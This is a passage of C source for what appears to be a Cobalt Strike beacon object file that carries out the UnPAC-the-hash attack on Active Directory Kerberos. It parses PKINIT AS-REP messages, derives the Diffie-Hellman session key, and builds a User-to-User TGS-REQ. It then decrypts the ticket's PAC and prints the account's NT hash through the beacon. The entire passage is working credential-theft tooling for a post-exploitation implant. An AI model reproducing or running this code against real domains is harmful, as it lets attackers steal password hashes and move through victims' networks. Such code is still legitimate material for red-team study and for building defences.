    free(pt);
    free(ptTag);

    /* padata-value [2] OCTET STRING (AP-REQ) */
    int pvLen;
    BYTE* pv = BuildOctetString(apReq, apReqLen, &pvLen);
    int pvTagLen;
    BYTE* pvTag = BuildContextTag(2, pv, pvLen, &pvTagLen);
    memcpy(padataContent + paOffset, pvTag, pvTagLen);
    paOffset += pvTagLen;
    free(pv);
    free(pvTag);
    free(apReq);

    int padataSeqLen;
    BYTE* padataSeq = BuildSequence(padataContent, paOffset, &padataSeqLen);

    /* padata [3] SEQUENCE OF PA-DATA */
    int padataOuterSeqLen;
    BYTE* padataOuterSeq = BuildSequence(padataSeq, padataSeqLen, &padataOuterSeqLen);
    free(padataSeq);
    int padataTagLen;
    BYTE* padataTag = BuildContextTag(3, padataOuterSeq, padataOuterSeqLen, &padataTagLen);
    free(padataOuterSeq);

    /* Build TGS-REQ */
    static BYTE tgsReqContent[8192];  /* static to avoid BOF stack overflow */
    int tgsOffset = 0;

    /* pvno [1] INTEGER 5 */
    int pvnoLen;
    BYTE* pvno = BuildInteger(5, &pvnoLen);
    int pvnoTagLen;
    BYTE* pvnoTag = BuildContextTag(1, pvno, pvnoLen, &pvnoTagLen);
    memcpy(tgsReqContent + tgsOffset, pvnoTag, pvnoTagLen);
    tgsOffset += pvnoTagLen;
    free(pvno);
    free(pvnoTag);

    /* msg-type [2] INTEGER 12 (TGS-REQ) */
    int mtLen;
    BYTE* mt = BuildInteger(12, &mtLen);
    int mtTagLen;
    BYTE* mtTag = BuildContextTag(2, mt, mtLen, &mtTagLen);
    memcpy(tgsReqContent + tgsOffset, mtTag, mtTagLen);
    tgsOffset += mtTagLen;
    free(mt);
    free(mtTag);

    /* padata [3] */
    memcpy(tgsReqContent + tgsOffset, padataTag, padataTagLen);
    tgsOffset += padataTagLen;
    free(padataTag);

    /* req-body [4] */
    int reqBodyTagLen;
    BYTE* reqBodyTag = BuildContextTag(4, reqBodySeq, reqBodySeqLen, &reqBodyTagLen);
    memcpy(tgsReqContent + tgsOffset, reqBodyTag, reqBodyTagLen);
    tgsOffset += reqBodyTagLen;
    free(reqBodyTag);
    free(reqBodySeq);

    /* Build TGS-REQ SEQUENCE */
    int tgsReqSeqLen;
    BYTE* tgsReqSeq = BuildSequence(tgsReqContent, tgsOffset, &tgsReqSeqLen);

    /* Wrap in APPLICATION 12 */
    BYTE* result = BuildApplication(12, tgsReqSeq, tgsReqSeqLen, outLen);
    free(tgsReqSeq);

    return result;
}

/*
 * =============================================================================
 * U2U - TGS-REP Processing
 * =============================================================================
 */

/* Extract ticket enc-part cipher from TGS-REP ticket */
static BYTE* ExtractTicketEncPartFromTgsRep(BYTE* tgsRep, int tgsRepLen, int* cipherLen) {
    int offset = 0;
    int length;

    /* Skip APPLICATION 13 */
    if (tgsRep[offset] == 0x6D) {
        offset++;
        offset += DecodeLength(tgsRep, offset, &length);
    }

    /* Skip outer SEQUENCE */
    if (tgsRep[offset] == 0x30) {
        offset++;
        offset += DecodeLength(tgsRep, offset, &length);
    }

    /* Find ticket [5] */
    while (offset < tgsRepLen - 10) {
        if (tgsRep[offset] == 0xA5) {
            offset++;
            offset += DecodeLength(tgsRep, offset, &length);
            int ticketEnd = offset + length;

            /* Skip APPLICATION 1 if present */
            if (tgsRep[offset] == 0x61) {
                offset++;
                offset += DecodeLength(tgsRep, offset, &length);
            }

            /* Skip SEQUENCE */
            if (tgsRep[offset] == 0x30) {
                offset++;
                offset += DecodeLength(tgsRep, offset, &length);
            }

            /* Find enc-part [3] in ticket */
            while (offset < ticketEnd - 10) {
                if (tgsRep[offset] == 0xA3) {
                    offset++;
                    offset += DecodeLength(tgsRep, offset, &length);

                    /* EncryptedData SEQUENCE */
                    if (tgsRep[offset] == 0x30) {
                        offset++;
                        int encDataLen;
                        offset += DecodeLength(tgsRep, offset, &encDataLen);
                        int encDataEnd = offset + encDataLen;

                        /* Find cipher [2] */
                        while (offset < encDataEnd) {
                            if (tgsRep[offset] == 0xA2) {
                                offset++;
                                offset += DecodeLength(tgsRep, offset, &length);
                                if (tgsRep[offset] == 0x04) {
                                    offset++;
                                    offset += DecodeLength(tgsRep, offset, cipherLen);
                                    BYTE* cipher = (BYTE*)malloc(*cipherLen);
                                    memcpy(cipher, tgsRep + offset, *cipherLen);
                                    return cipher;
                                }
                            } else if ((tgsRep[offset] & 0xE0) == 0xA0) {
                                offset++;
                                int skipLen;
                                offset += DecodeLength(tgsRep, offset, &skipLen);
                                offset += skipLen;
                            } else {
                                offset++;
                            }
                        }
                    }
                    break;
                } else if ((tgsRep[offset] & 0xE0) == 0xA0) {
                    offset++;
                    int skipLen;
                    offset += DecodeLength(tgsRep, offset, &skipLen);
                    offset += skipLen;
                } else {
                    offset++;
                }
            }
            break;
        } else if ((tgsRep[offset] & 0xE0) == 0xA0) {
            offset++;
            int skipLen;
            offset += DecodeLength(tgsRep, offset, &skipLen);
            offset += skipLen;
        } else {
            offset++;
        }
    }

    *cipherLen = 0;
    return NULL;
}

/* Extract PAC from EncTicketPart authorization-data */
static BYTE* ExtractPacFromEncTicketPart(BYTE* encTicketPart, int encTicketPartLen, int* pacLen) {
    int offset = 0;
    int length;

    /* Skip APPLICATION 3 if present */
    if (encTicketPart[offset] == 0x63) {
        offset++;
        offset += DecodeLength(encTicketPart, offset, &length);
    }

    /* Skip SEQUENCE */
    if (encTicketPart[offset] == 0x30) {
        offset++;
        offset += DecodeLength(encTicketPart, offset, &length);
    }

    /* Find authorization-data [10] */
    while (offset < encTicketPartLen - 10) {
        if (encTicketPart[offset] == 0xAA) {
            offset++;
            int authDataLen;
            offset += DecodeLength(encTicketPart, offset, &authDataLen);

            /* Parse authorization-data for PAC (ad-type 128) */
            /* May be wrapped in AD-IF-RELEVANT (type 1) */
            return ExtractPacFromAuthData(encTicketPart + offset, authDataLen, pacLen);
        } else if ((encTicketPart[offset] & 0xE0) == 0xA0) {
            offset++;
            int skipLen;
            offset += DecodeLength(encTicketPart, offset, &skipLen);
            offset += skipLen;
        } else {
            offset++;
        }
    }

    *pacLen = 0;
    return NULL;
}

/* Recursive extraction of PAC from AuthorizationData */
static BYTE* ExtractPacFromAuthData(BYTE* authData, int authDataLen, int* pacLen) {
    int offset = 0;
    int length;

    /* Skip SEQUENCE if present */
    if (authData[offset] == 0x30) {
        offset++;
        offset += DecodeLength(authData, offset, &length);
    }

    while (offset < authDataLen - 5) {
        if (authData[offset] == 0x30) {
            offset++;
            int elemLen;
            offset += DecodeLength(authData, offset, &elemLen);
            int elemEnd = offset + elemLen;

            int adType = -1;
            BYTE* adData = NULL;
            int adDataLen = 0;

            while (offset < elemEnd) {
                if (authData[offset] == 0xA0) { /* ad-type [0] */
                    offset++;
                    offset += DecodeLength(authData, offset, &length);
                    if (authData[offset] == 0x02) {
                        offset++;
                        int intLen = authData[offset++];
                        adType = 0;
                        for (int i = 0; i < intLen; i++) {
                            adType = (adType << 8) | authData[offset++];
                        }
                    }
                } else if (authData[offset] == 0xA1) { /* ad-data [1] */
                    offset++;
                    offset += DecodeLength(authData, offset, &length);
                    if (authData[offset] == 0x04) {
                        offset++;
                        offset += DecodeLength(authData, offset, &adDataLen);
                        adData = authData + offset;
                        offset += adDataLen;
                    }
                } else {
                    offset++;
                }
            }

            if (adType == 1 && adData) { /* AD-IF-RELEVANT - recurse */
                BYTE* result = ExtractPacFromAuthData(adData, adDataLen, pacLen);
                if (result) return result;
            } else if (adType == 128 && adData) { /* PAC */
                BYTE* result = (BYTE*)malloc(adDataLen);
                memcpy(result, adData, adDataLen);
                *pacLen = adDataLen;
                return result;
            }

            offset = elemEnd;
        } else {
            offset++;
        }
    }

    *pacLen = 0;
    return NULL;
}

/* Parse PAC structure and extract PAC_CREDENTIAL_INFO */
static void ParsePacAndExtractNtHash(BYTE* pac, int pacLen, BYTE* replyKey, int replyKeyLen) {
    if (pacLen < 8) {
        BeaconPrintf(CALLBACK_OUTPUT, "[!] PAC too small");
        return;
    }

    DWORD cBuffers = *(DWORD*)pac;

    int offset = 8;
    for (DWORD i = 0; i < cBuffers && offset + 16 <= pacLen; i++) {
        DWORD ulType = *(DWORD*)(pac + offset);
        DWORD cbBufferSize = *(DWORD*)(pac + offset + 4);
        ULONGLONG bufferOffset = *(ULONGLONG*)(pac + offset + 8);

        /* Type 2 = PAC_CREDENTIAL_INFO */
        if (ulType == 2 && bufferOffset + cbBufferSize <= (ULONGLONG)pacLen) {
            BYTE* credInfo = pac + bufferOffset;

            if (cbBufferSize < 8) {
                continue;
            }

            DWORD encType = *(DWORD*)(credInfo + 4);
            BYTE* encData = credInfo + 8;
            int encDataLen = cbBufferSize - 8;

            /* Decrypt with AS reply key (key usage 16) */
            int decLen;
            BYTE* decrypted = KerberosDecrypt(encType, KRB_KEY_USAGE_PAC_CREDENTIAL,
                                              replyKey, replyKeyLen, encData, encDataLen, &decLen);

            if (decrypted) {
                ParsePacCredentialData(decrypted, decLen);
                free(decrypted);
            } else {
                BeaconPrintf(CALLBACK_OUTPUT, "[!] Failed to decrypt PAC_CREDENTIAL_INFO");
            }
        }

        offset += 16;
    }
}

/* Process TGS-REP and extract NT hash */
static void ProcessTgsRep(BYTE* tgsRep, int tgsRepLen, BYTE* sessionKey, int sessionKeyLen,
                          BYTE* replyKey, int replyKeyLen) {
    /* Check message type */
    if (tgsRep[0] == 0x7E) {
        /* KRB-ERROR */
        BeaconPrintf(CALLBACK_OUTPUT, "[!] TGS-REQ returned KRB-ERROR");
        int i;
        for (i = 0; i < tgsRepLen - 5; i++) {
            if (tgsRep[i] == 0xA6 && tgsRep[i+2] == 0x02) {
                int errCode = 0;
                int errLen = tgsRep[i+3];
                for (int j = 0; j < errLen; j++) {
                    errCode = (errCode << 8) | tgsRep[i+4+j];
                }
                BeaconPrintf(CALLBACK_OUTPUT, "[!] Error code: %d - %s", errCode, GetKrbErrorDesc(errCode));
                break;
            }
        }
        return;
    }

    if (tgsRep[0] != 0x6D) {
        BeaconPrintf(CALLBACK_OUTPUT, "[!] Unexpected TGS response type: 0x%02X", tgsRep[0]);
        return;
    }

    /* Extract ticket enc-part */
    int ticketEncPartLen;
    BYTE* ticketEncPart = ExtractTicketEncPartFromTgsRep(tgsRep, tgsRepLen, &ticketEncPartLen);
    if (!ticketEncPart) {
        BeaconPrintf(CALLBACK_OUTPUT, "[!] Could not extract ticket enc-part from TGS-REP");
        return;
    }

    /* Decrypt with session key (key usage 2 for U2U ticket enc-part) */
    int decTicketLen;
    BYTE* decTicket = KerberosDecrypt(ETYPE_AES256_CTS_HMAC_SHA1, KRB_KEY_USAGE_TICKET_ENCPART,
                                       sessionKey, sessionKeyLen, ticketEncPart, ticketEncPartLen, &decTicketLen);
    free(ticketEncPart);

    if (!decTicket) {
        BeaconPrintf(CALLBACK_OUTPUT, "[!] Failed to decrypt ticket enc-part");
        return;
    }

    /* Extract PAC from authorization-data */
    int pacLen;
    BYTE* pac = ExtractPacFromEncTicketPart(decTicket, decTicketLen, &pacLen);
    free(decTicket);

    if (!pac) {
        BeaconPrintf(CALLBACK_OUTPUT, "[!] Could not extract PAC from EncTicketPart");
        return;
    }

    /* Parse PAC and extract NT hash */
    ParsePacAndExtractNtHash(pac, pacLen, replyKey, replyKeyLen);
    free(pac);
}

/* Perform U2U TGS-REQ to extract NT hash */
static void PerformU2U(const char* kdcHost, const char* user, const char* realm,
                       BYTE* ticket, int ticketLen, BYTE* sessionKey, int sessionKeyLen,
                       BYTE* replyKey, int replyKeyLen) {
    /* Build TGS-REQ */
    int tgsReqLen;
    BYTE* tgsReq = BuildU2UTgsReq(user, realm, ticket, ticketLen, sessionKey, sessionKeyLen, &tgsReqLen);
    if (!tgsReq) {
        BeaconPrintf(CALLBACK_OUTPUT, "[!] Failed to build U2U TGS-REQ");
        return;
    }

    /* Send to KDC */
    int tgsRepLen;
    BYTE* tgsRep = SendToKdc(kdcHost, 88, tgsReq, tgsReqLen, &tgsRepLen);
    free(tgsReq);

    if (!tgsRep) {
        BeaconPrintf(CALLBACK_OUTPUT, "[!] Failed to send TGS-REQ to KDC");
        return;
    }

    /* Process TGS-REP */
    ProcessTgsRep(tgsRep, tgsRepLen, sessionKey, sessionKeyLen, replyKey, replyKeyLen);
    free(tgsRep);
}

/*
 * =============================================================================
 * UnPAC-the-hash - AS-REP Parsing
 * =============================================================================
 */

/* Extract enc-part cipher from AS-REP */
static BYTE* ExtractEncPartFromAsRep(BYTE* asRep, int asRepLen, int* cipherLen) {
    int offset = 0;
    int length;

    /* Skip APPLICATION 11 tag */
    if (asRep[offset] == 0x6B) {
        offset++;
        offset += DecodeLength(asRep, offset, &length);
    }

    /* Skip outer SEQUENCE */
    if (asRep[offset] == 0x30) {
        offset++;
        offset += DecodeLength(asRep, offset, &length);
    }

    /* Find enc-part [6] */
    while (offset < asRepLen - 10) {
        if (asRep[offset] == 0xA6) {
            offset++;
            offset += DecodeLength(asRep, offset, &length);

            /* EncryptedData SEQUENCE */
            if (asRep[offset] == 0x30) {
                offset++;
                int encDataLen;
                offset += DecodeLength(asRep, offset, &encDataLen);
                int encDataEnd = offset + encDataLen;

                /* Find cipher [2] */
                while (offset < encDataEnd) {
                    if (asRep[offset] == 0xA2) {
                        offset++;
                        offset += DecodeLength(asRep, offset, &length);

                        if (asRep[offset] == 0x04) {
                            offset++;
                            offset += DecodeLength(asRep, offset, cipherLen);

                            BYTE* cipher = (BYTE*)malloc(*cipherLen);
                            memcpy(cipher, asRep + offset, *cipherLen);
                            return cipher;
                        }
                    } else if ((asRep[offset] & 0xE0) == 0xA0) {
                        offset++;
                        int skipLen;
                        offset += DecodeLength(asRep, offset, &skipLen);
                        offset += skipLen;
                    } else {
                        offset++;
                    }
                }
            }
            break;
        } else if ((asRep[offset] & 0xE0) == 0xA0) {
            offset++;
            int skipLen;
            offset += DecodeLength(asRep, offset, &skipLen);
            offset += skipLen;
        } else {
            offset++;
        }
    }

    return NULL;
}

/* Extract session key from decrypted EncASRepPart */
static BYTE* ExtractSessionKey(BYTE* decrypted, int decryptedLen, int* keyLen, int* keyType) {
    int offset = 0;
    int length;

    /* Skip APPLICATION 25 if present */
    if (decrypted[offset] == 0x79) {
        offset++;
        offset += DecodeLength(decrypted, offset, &length);
    }

    /* Skip SEQUENCE */
    if (decrypted[offset] == 0x30) {
        offset++;
        offset += DecodeLength(decrypted, offset, &length);
    }

    /* Find key [0] */
    if (decrypted[offset] == 0xA0) {
        offset++;
        offset += DecodeLength(decrypted, offset, &length);

        /* EncryptionKey SEQUENCE */
        if (decrypted[offset] == 0x30) {
            offset++;
            offset += DecodeLength(decrypted, offset, &length);

            /* keytype [0] */
            if (decrypted[offset] == 0xA0) {
                offset++;
                offset += DecodeLength(decrypted, offset, &length);
                if (decrypted[offset] == 0x02) {
                    offset++;
                    int intLen = decrypted[offset++];
                    *keyType = 0;
                    for (int i = 0; i < intLen; i++) {
                        *keyType = (*keyType << 8) | decrypted[offset++];
                    }
                }
            }

            /* keyvalue [1] */
            if (decrypted[offset] == 0xA1) {
                offset++;
                offset += DecodeLength(decrypted, offset, &length);
                if (decrypted[offset] == 0x04) {
                    offset++;
                    offset += DecodeLength(decrypted, offset, keyLen);

                    BYTE* keyValue = (BYTE*)malloc(*keyLen);
                    memcpy(keyValue, decrypted + offset, *keyLen);
                    return keyValue;
                }
            }
        }
    }

    return NULL;
}

/* Extract PA-PAC-CREDENTIALS from AS-REP padata */
static BYTE* ExtractPaPacCredentials(BYTE* asRep, int asRepLen, int* credLen) {
    int offset = 0;
    int length;

    /* Skip APPLICATION 11 tag */
    if (asRep[offset] == 0x6B) {
        offset++;
        offset += DecodeLength(asRep, offset, &length);
    }

    /* Skip outer SEQUENCE */
    if (asRep[offset] == 0x30) {
        offset++;
        offset += DecodeLength(asRep, offset, &length);
    }

    /* Find padata [2] */
    int padataOffset = -1;
    int padataEnd = -1;

    while (offset < asRepLen - 10) {
        if (asRep[offset] == 0xA2) {
            offset++;
            int padataLen;
            offset += DecodeLength(asRep, offset, &padataLen);
            padataOffset = offset;
            padataEnd = offset + padataLen;
            break;
        } else if ((asRep[offset] & 0xE0) == 0xA0) {
            offset++;
            int skipLen;
            offset += DecodeLength(asRep, offset, &skipLen);
            offset += skipLen;
        } else {
            offset++;
        }
    }

    if (padataOffset < 0) return NULL;

    /* Parse padata SEQUENCE for type 167 */
    int pos = padataOffset;
    if (asRep[pos] == 0x30) {
        pos++;
        pos += DecodeLength(asRep, pos, &length);
    }

    while (pos < padataEnd - 5) {
        if (asRep[pos] != 0x30) {
            pos++;
            continue;
        }

        pos++;
        int paDataLen;
        pos += DecodeLength(asRep, pos, &paDataLen);
        int paDataEnd = pos + paDataLen;

        int padataType = -1;
        int valueOffset = -1;
        int valueLen = 0;

        while (pos < paDataEnd) {
            BYTE tag = asRep[pos];
            if (tag == 0xA1) {
                pos++;
                pos += DecodeLength(asRep, pos, &length);
                if (asRep[pos] == 0x02) {
                    pos++;
                    int intLen = asRep[pos++];
                    padataType = 0;
                    for (int i = 0; i < intLen; i++) {
                        padataType = (padataType << 8) | asRep[pos++];
                    }
                }
            } else if (tag == 0xA2) {
                pos++;
                int ctxLen;
                pos += DecodeLength(asRep, pos, &ctxLen);
                if (asRep[pos] == 0x04) {
                    pos++;
                    pos += DecodeLength(asRep, pos, &valueLen);
                    valueOffset = pos;
                    pos += valueLen;
                } else {
                    valueOffset = pos;
                    valueLen = ctxLen;
                    pos += ctxLen;
                }
            } else {
                pos++;
                if (pos < paDataEnd) {
                    int skipLen;
                    pos += DecodeLength(asRep, pos, &skipLen);
                    pos += skipLen;
                }
            }
        }

        if (padataType == PA_PAC_CREDENTIALS && valueOffset > 0) {
            BYTE* result = (BYTE*)malloc(valueLen);
            memcpy(result, asRep + valueOffset, valueLen);
            *credLen = valueLen;
            return result;
        }

        pos = paDataEnd;
    }

    return NULL;
}

/* Parse PAC_CREDENTIAL_DATA and extract NT hash */
static void ParsePacCredentialData(BYTE* data, int dataLen) {
    int i, j;

    if (dataLen < 8) {
        return;
    }

    /* PAC_CREDENTIAL_DATA is NDR encoded:
     * NTLM_SUPPLEMENTAL_CREDENTIAL contains the NT hash at offset +24
     */

    /* Method 1: Search for "NTLM" string (Unicode: 'N' 00 'T' 00 'L' 00 'M' 00) */
    for (i = 0; i < dataLen - 50; i++) {
        if (data[i] == 'N' && data[i+1] == 0 &&
            data[i+2] == 'T' && data[i+3] == 0 &&
            data[i+4] == 'L' && data[i+5] == 0 &&
            data[i+6] == 'M' && data[i+7] == 0) {

            /* NTLM_SUPPLEMENTAL_CREDENTIAL typically follows:
             * After package name + padding, look for the structure:
             * Version (4), Flags (4), LmPassword (16), NtPassword (16)
             * Total 40 bytes of credential data
             */
            for (j = i + 8; j < dataLen - 40; j++) {
                /* Look for Version=0 and reasonable Flags */
                if (*(DWORD*)(data + j) == 0) {
                    DWORD flags = *(DWORD*)(data + j + 4);
                    /* Common flags: 0x01 (NtPresent), 0x02 (LmPresent), etc */
                    if (flags > 0 && flags < 0x100) {
                        BYTE* lmHash = data + j + 8;
                        BYTE* ntHash = data + j + 24;

                        /* Check if NT hash looks valid (not all zeros, not all same) */
                        int hasData = 0;
                        for (int k = 0; k < 16; k++) {
                            if (ntHash[k] != 0) hasData = 1;
                        }

                        if (hasData) {
                            BeaconPrintf(CALLBACK_OUTPUT, "[+] NT Hash: %02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x",
                                ntHash[0], ntHash[1], ntHash[2], ntHash[3],
                                ntHash[4], ntHash[5], ntHash[6], ntHash[7],
                                ntHash[8], ntHash[9], ntHash[10], ntHash[11],
                                ntHash[12], ntHash[13], ntHash[14], ntHash[15]);
                            return;
                        }
                    }
                }
            }
        }
    }

    /* Method 2: Direct scan at expected offsets in PAC_CREDENTIAL_DATA */
    int offsets[] = {0x30, 0x38, 0x40, 0x48, 0x50, 0x58, 0x60, 0x68};
    for (j = 0; j < 8; j++) {
        int off = offsets[j];
        if (off + 40 <= dataLen) {
            BYTE* ntHash = data + off + 24;

            int hasData = 0, unique = 0;
            BYTE seen[256] = {0};
            for (i = 0; i < 16; i++) {
                if (ntHash[i] != 0) hasData = 1;
                if (!seen[ntHash[i]]) {
                    seen[ntHash[i]] = 1;
                    unique++;
                }
            }

            if (hasData && unique >= 6) {
                BeaconPrintf(CALLBACK_OUTPUT, "[+] NT Hash: %02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x",
                    ntHash[0], ntHash[1], ntHash[2], ntHash[3],
                    ntHash[4], ntHash[5], ntHash[6], ntHash[7],
                    ntHash[8], ntHash[9], ntHash[10], ntHash[11],
                    ntHash[12], ntHash[13], ntHash[14], ntHash[15]);
                return;
            }
        }
    }
}

/*
 * =============================================================================
 * kTruncate - RFC 4556 Key Derivation
 * =============================================================================
 */

/* Compute SHA-1 hash */
static void ComputeSha1(BYTE* data, int dataLen, BYTE* hash) {
    HCRYPTPROV hProv;
    HCRYPTHASH hHash;
    DWORD hashLen = 20;

    if (CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_FULL, CRYPT_VERIFYCONTEXT)) {
        if (CryptCreateHash(hProv, CALG_SHA1, 0, 0, &hHash)) {
            CryptHashData(hHash, data, dataLen, 0);
            CryptGetHashParam(hHash, HP_HASHVAL, hash, &hashLen, 0);
            CryptDestroyHash(hHash);
        }
        CryptReleaseContext(hProv, 0);
    }
}

/* kTruncate function - RFC 4556 Section 3.2.3.1 */
static void KTruncate(int k, BYTE* x, int xLen, BYTE* result) {
    int offset = 0;
    BYTE counter = 0;
    BYTE* toHash = (BYTE*)malloc(1 + xLen);

    while (offset < k) {
        BYTE hash[20];
        int copyLen;

        /* Hash = SHA1(counter || x) */
        toHash[0] = counter;
        memcpy(toHash + 1, x, xLen);
        ComputeSha1(toHash, 1 + xLen, hash);

        /* Copy hash bytes to result */
        copyLen = (k - offset < 20) ? (k - offset) : 20;
        memcpy(result + offset, hash, copyLen);
        offset += copyLen;
        counter++;
    }

    free(toHash);
}

/* Derive session key from DH shared secret (RFC 4556) */
static void DeriveSessionKey(BYTE* sharedSecret, int secretLen, BYTE* serverNonce, int nonceLen, BYTE* sessionKey, int keyLen) {
    /* x = Z || server_nonce (client nonce is empty per Rubeus) */
    int xLen = secretLen + nonceLen;
    BYTE* x = (BYTE*)malloc(xLen);

    memcpy(x, sharedSecret, secretLen);
    if (nonceLen > 0 && serverNonce) {
        memcpy(x + secretLen, serverNonce, nonceLen);
    }

    /* Apply kTruncate */
    KTruncate(keyLen, x, xLen, sessionKey);

    free(x);
}

/*
 * =============================================================================
 * Extract KDC DH Public Key from PA-PK-AS-REP
 * =============================================================================
 */

/* Extract KDC's DH public key from AS-REP */
static BYTE* ExtractKdcDhPublicKey(BYTE* asRep, int asRepLen, int* keyLen) {
    int i;
    /* DH OID pattern: 1.2.840.10046.2.1 = 2A 86 48 CE 3E 02 01 */
    BYTE dhOidPattern[] = { 0x2A, 0x86, 0x48, 0xCE, 0x3E, 0x02, 0x01 };

    /* Search for DH OID in response */
    for (i = 0; i < asRepLen - (int)sizeof(dhOidPattern) - 10; i++) {
        int j, found = 1;
        for (j = 0; j < (int)sizeof(dhOidPattern); j++) {
            if (asRep[i + j] != dhOidPattern[j]) {
                found = 0;
                break;
            }
        }

        if (found) {
            /* Found DH OID, now search for large INTEGER (~128 bytes) */
            int searchStart = i + sizeof(dhOidPattern);
            int searchEnd = (searchStart + 500 < asRepLen) ? searchStart + 500 : asRepLen - 10;

            for (j = searchStart; j < searchEnd; j++) {
                if (asRep[j] == 0x02) { /* INTEGER tag */
                    int len = 0;
                    int lenBytes = 1;
                    int dataOffset;

                    if ((asRep[j + 1] & 0x80) != 0) {
                        lenBytes = (asRep[j + 1] & 0x7F) + 1;
                        int k;
                        for (k = 1; k < lenBytes; k++) {
                            len = (len << 8) | asRep[j + 1 + k];
                        }
                    } else {
                        len = asRep[j + 1];
                    }

                    dataOffset = j + 1 + lenBytes;

                    /* Looking for ~128 byte integer (DH public key) */
                    if (len >= 120 && len <= 140) {
                        BYTE* result = (BYTE*)malloc(128);
                        BYTE* intData = asRep + dataOffset;
                        int copyLen = len;
                        int destOffset = 0;

                        /* Skip leading zero if present */
                        if (intData[0] == 0 && copyLen > 1) {
                            intData++;
                            copyLen--;
                        }

                        /* Pad to 128 bytes */
                        memset(result, 0, 128);
                        destOffset = 128 - copyLen;
                        if (destOffset < 0) destOffset = 0;
                        memcpy(result + destOffset, intData, (copyLen > 128) ? 128 : copyLen);

                        *keyLen = 128;
                        return result;
                    }
                }
            }
        }
    }

    /* Fallback: Search for any large INTEGER that could be the DH public key */
    for (i = 0; i < asRepLen - 140; i++) {
        if (asRep[i] == 0x02) { /* INTEGER tag */
            int len = 0;
            int lenBytes = 1;
            int dataOffset;

            if ((asRep[i + 1] & 0x80) != 0) {
                lenBytes = (asRep[i + 1] & 0x7F) + 1;
                int k;
                for (k = 1; k < lenBytes; k++) {
                    len = (len << 8) | asRep[i + 1 + k];
                }
            } else {
                len = asRep[i + 1];
            }

            /* Looking for ~128 byte integer (DH public key) */
            if (len >= 120 && len <= 140) {
                dataOffset = i + 1 + lenBytes;

                BYTE* result = (BYTE*)malloc(128);
                BYTE* intData = asRep + dataOffset;
                int copyLen = len;
                int destOffset = 0;

                /* Skip leading zero if present */
                if (intData[0] == 0 && copyLen > 1) {
                    intData++;
                    copyLen--;
                }

                /* Pad to 128 bytes */
                memset(result, 0, 128);
                destOffset = 128 - copyLen;
                if (destOffset < 0) destOffset = 0;
                memcpy(result + destOffset, intData, (copyLen > 128) ? 128 : copyLen);

                *keyLen = 128;
                return result;
            }
        }
    }

    BeaconPrintf(CALLBACK_OUTPUT, "[!] Could not find DH public key (no 128-byte INTEGER found)");
    *keyLen = 0;
    return NULL;
}

/* Extract server DH nonce from PA-PK-AS-REP */
static BYTE* ExtractServerDhNonce(BYTE* asRep, int asRepLen, int* nonceLen) {
    int i;
    /* Search for 32-byte OCTET STRING that could be server nonce */
    for (i = 0; i < asRepLen - 34; i++) {
        if (asRep[i] == 0x04 && asRep[i + 1] == 0x20) { /* OCTET STRING of 32 bytes */
            BYTE* candidate = asRep + i + 2;
            int j, hasVariation = 0, allZero = 1;

            for (j = 1; j < 32; j++) {
                if (candidate[j] != candidate[0]) hasVariation = 1;
                if (candidate[j] != 0) allZero = 0;
            }

            if (hasVariation && !allZero) {
                BYTE* result = (BYTE*)malloc(32);
                memcpy(result, candidate, 32);
                *nonceLen = 32;
                return result;
            }
        }
    }

    *nonceLen = 0;
    return NULL;
}

/* Kerberos error code descriptions */
static const char* GetKrbErrorDesc(int code) {
    switch(code) {
        case 3: return "KDC_ERR_BAD_PVNO - Bad protocol version";
        case 6: return "KDC_ERR_C_PRINCIPAL_UNKNOWN - Client not found in database";
        case 7: return "KDC_ERR_S_PRINCIPAL_UNKNOWN - Server not found in database";
        case 14: return "KDC_ERR_PA_CHECKSUM_MUST_BE_INCLUDED - Checksum must be included";
        case 16: return "KDC_ERR_PADATA_TYPE_NOSUPP - PA-DATA type not supported";
        case 17: return "KDC_ERR_TRTYPE_NOSUPP - Transited type not supported";
        case 18: return "KDC_ERR_CLIENT_REVOKED - Client's credentials revoked";
        case 24: return "KDC_ERR_PREAUTH_FAILED - Pre-authentication failed";
        case 25: return "KDC_ERR_PREAUTH_REQUIRED - Pre-authentication required";
        case 41: return "KDC_ERR_CLIENT_NOT_TRUSTED - Client not trusted for PKINIT";
        case 42: return "KDC_ERR_KDC_NOT_TRUSTED - KDC not trusted for PKINIT";
        case 43: return "KDC_ERR_INVALID_SIG - Invalid certificate signature";
        case 44: return "KDC_ERR_DH_KEY_PARAMETERS_NOT_ACCEPTED - DH parameters rejected";
        case 62: return "KRB_AP_ERR_USER_TO_USER_REQUIRED - U2U required";
        case 68: return "KDC_ERR_WRONG_REALM - Wrong realm";
        case 69: return "KDC_ERR_CANT_VERIFY_CERTIFICATE - Cannot verify certificate";
        case 70: return "KDC_ERR_INVALID_CERTIFICATE - Invalid certificate";
        case 71: return "KDC_ERR_REVOKED_CERTIFICATE - Certificate revoked";
        case 72: return "KDC_ERR_REVOCATION_STATUS_UNKNOWN - Revocation status unknown";
        case 73: return "KDC_ERR_REVOCATION_STATUS_UNAVAILABLE - Revocation status unavailable";
        case 75: return "KDC_ERR_INCONSISTENT_KEY_PURPOSE - Inconsistent key purpose";
        case 76: return "KDC_ERR_DIGEST_IN_CERT_NOT_ACCEPTED - Digest in cert not accepted";
        case 77: return "KDC_ERR_PA_CHECKSUM_MUST_BE_INCLUDED - PA checksum must be included";
        case 78: return "KDC_ERR_DIGEST_IN_SIGNED_DATA_NOT_ACCEPTED - Digest in signed data not accepted";
        case 79: return "KDC_ERR_PUBLIC_KEY_ENCRYPTION_NOT_SUPPORTED - Public key encryption not supported";
        default: return "Unknown error";
    }
}

/* Process AS-REP and extract NT hash */
static void ProcessAsRep(BYTE* asRep, int asRepLen, PCCERT_CONTEXT pCert,
                         const char* user, const char* realm, const char* kdcHost, int noUnpac) {

    /* Check message type */
    if (asRep[0] == 0x7E) {
        /* KRB-ERROR */
        BeaconPrintf(CALLBACK_OUTPUT, "[!] Received KRB-ERROR");
        /* Parse error code */
        int i;
        int errCode = -1;
        for (i = 0; i < asRepLen - 5; i++) {
            if (asRep[i] == 0xA6 && asRep[i+2] == 0x02) { /* error-code [6] INTEGER */
                errCode = 0;
                int errLen = asRep[i+3];
                int j;
                for (j = 0; j < errLen; j++) {
                    errCode = (errCode << 8) | asRep[i+4+j];
                }
                BeaconPrintf(CALLBACK_OUTPUT, "[!] Error code: %d (0x%X)", errCode, errCode);
